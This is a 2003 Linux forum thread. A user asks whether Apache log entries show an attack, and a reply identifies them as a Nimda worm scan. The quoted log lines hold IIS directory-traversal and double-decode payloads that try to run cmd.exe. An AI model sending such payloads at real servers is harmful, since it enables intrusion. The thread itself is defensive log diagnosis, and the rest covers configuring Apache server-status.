LinuxQuestions.org
Old 08-12-2003, 07:13 AM   #1
lucastic
Member
 
Registered: Aug 2003
Location: Oz
Distribution: Gentoo - Debian
Posts: 202

Rep: Reputation: 30
newbie question: do these logs show a hack attempt


Hello,

I am new to Linux, liking it much more than Windows every day. I have set up a very simple server and was wondering if someone could look at the access_log files and tell me if they look suspicious.
Or is it just harmless server chatter?

I noticed they were trying to execute?? .../cmd.exe, root.exe and c+dir commands.

By the way, can anyone tell me how to get good realtime monitoring for a small server, i.e. to see who's online and how long they have been browsing etc.? I have looked in my bible and online and can find nothing comprehensive about it, except for /server-info and /server-status, both of which I cannot seem to get working.

Thanks in advance

Lucas

203.162.20.212 - - [11/Aug/2003:15:43:36 +091800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
203.162.20.212 - - [11/Aug/2003:15:43:38 +091800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
203.162.20.212 - - [11/Aug/2003:15:43:39 +091800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
203.162.20.212 - - [11/Aug/2003:15:43:40 +091800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
203.162.20.212 - - [11/Aug/2003:15:43:42 +091800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
203.162.20.212 - - [11/Aug/2003:15:43:43 +091800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
203.162.20.212 - - [11/Aug/2003:15:43:45 +091800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
203.162.20.212 - - [11/Aug/2003:15:43:46 +091800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
203.162.20.212 - - [11/Aug/2003:15:43:48 +091800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:52 +091800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:54 +091800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:55 +091800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
203.162.20.212 - - [11/Aug/2003:15:43:56 +091800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
203.162.20.212 - - [11/Aug/2003:15:43:58 +091800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
203.162.20.212 - - [11/Aug/2003:15:43:59 +091800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
203.162.20.212 - - [11/Aug/2003:15:44:00 +091800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
 
Old 08-12-2003, 07:34 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
IIRC, that looks like a Nimda scan. It's a Microsoft worm that looks for a series of exploits in MS IIS webservers. Aside from the annoying amount of length they take up in your access_log files, they are harmless to all non-Microsoft webservers.

Several of the lines look for common misconfigurations, several attempt to execute commands by using the double-decode weakness to move into the server root. Either way you don't have to worry.

server-status is usually running by default. Access might be restricted to the loopback interface (http://127.0.0.1/server-status).
 
Old 08-12-2003, 12:16 PM   #3
lucastic
Member
 
Registered: Aug 2003
Location: Oz
Distribution: Gentoo - Debian
Posts: 202

Original Poster
Rep: Reputation: 30
Hi,

Thanks for your previous reply.

However, could someone please help; I cannot seem to get .../server-status working at all. I have edited httpd.conf in the .../apache2/conf file.
Here is a bit from my httpd.conf:

<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

I have turned extended server status on, and still nothing?

I am using Red Hat 9 with the latest downloaded Apache, and I cannot figure out why server-status is not working.

If it was working should there be a file called server-status in the /htdocs file?

Thanks

Lucas
 
Old 08-12-2003, 01:16 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
If you have a static IP address, all you have to do is put that in there. You can even put in a partial address, like 192.168. (which would allow access from the whole subnet). So if you want to access the server status page from 192.168.1.2, your httpd.conf file would look like this:

#
# Allow server status reports, with the URL of http://servername/server-status
# Change the ".your-domain.com" to match your domain to enable.
#
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 192.168.1.2
</Location>


Make sure that you are uncommenting the server status section as well as restarting Apache so that it re-reads the .conf file. If Apache is up and running, you should be able to access it. (I just tried this on a fresh install and it works.)
 
Old 08-13-2003, 08:07 AM   #5
lucastic
Member
 
Registered: Aug 2003
Location: Oz
Distribution: Gentoo - Debian
Posts: 202

Original Poster
Rep: Reputation: 30
Thanks it worked.